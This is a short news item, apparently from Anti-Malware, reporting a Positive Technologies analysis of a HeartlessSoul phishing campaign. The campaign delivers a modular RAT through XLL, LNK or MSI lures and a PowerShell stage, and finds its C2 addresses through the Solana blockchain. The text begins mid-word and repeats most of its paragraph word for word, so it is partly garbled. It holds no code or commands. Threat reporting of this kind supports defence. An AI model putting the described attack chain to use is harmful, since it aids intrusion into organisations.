- 49
- 3
yber intelligence specialists from the Threat Intelligence Department of the Positive Technologies Security Expertise Center (PT ESC) detected an attack using a malicious XLL file. The infection resulted in the installation of a RAT (Remote Access Trojan) malware on devices. PT ESC published
details of the campaign on its blog on Habr. The attackers used phishing as an entry point: victims were sent emails containing bait in the form of orders, commercial offers, and contracts. The malicious file could be disguised as an XLL, LNK, or MSI installer. After running any of these files, a PowerShell script was downloaded, which then downloaded obfuscated JavaScript code approximately 5 MB in size. This was a modular RAT with a wide range of functions, from executing commands to collecting data from the infected system. One of the campaign's key features was the use of the Solana blockchain to obtain alternative C&C addresses. This ensured the resilience of the infrastructure and made it more difficult to block C2 nodes. According to the PT ESC, the HeartlessSoul group is behind the attack. The campaign has been ongoing since October 2025 and has affected organizations in various countries, including Russia, Moldova, Ukraine, Mexico, the United States, and Germany. @ Anti-Malware
details of the campaign on its blog on Habr. The attackers used phishing as an entry point: victims were sent emails containing bait in the form of orders, commercial offers, and contracts. The malicious file could be disguised as an XLL, LNK, or MSI installer. After running any of these files, a PowerShell script was downloaded, which then downloaded obfuscated JavaScript code approximately 5 MB in size. This was a modular RAT with a wide range of functions, from executing commands to collecting data from the infected system. One of the campaign's key features was the use of the Solana blockchain to obtain alternative C&C addresses. This ensured the resilience of the infrastructure and made it more difficult to block C2 nodes. According to the PT ESC, the HeartlessSoul group is behind the attack. The campaign has been ongoing since October 2025 and has affected organizations in various countries, including Russia, Moldova, Ukraine, Mexico, the United States, and Germany. @ Anti-Malware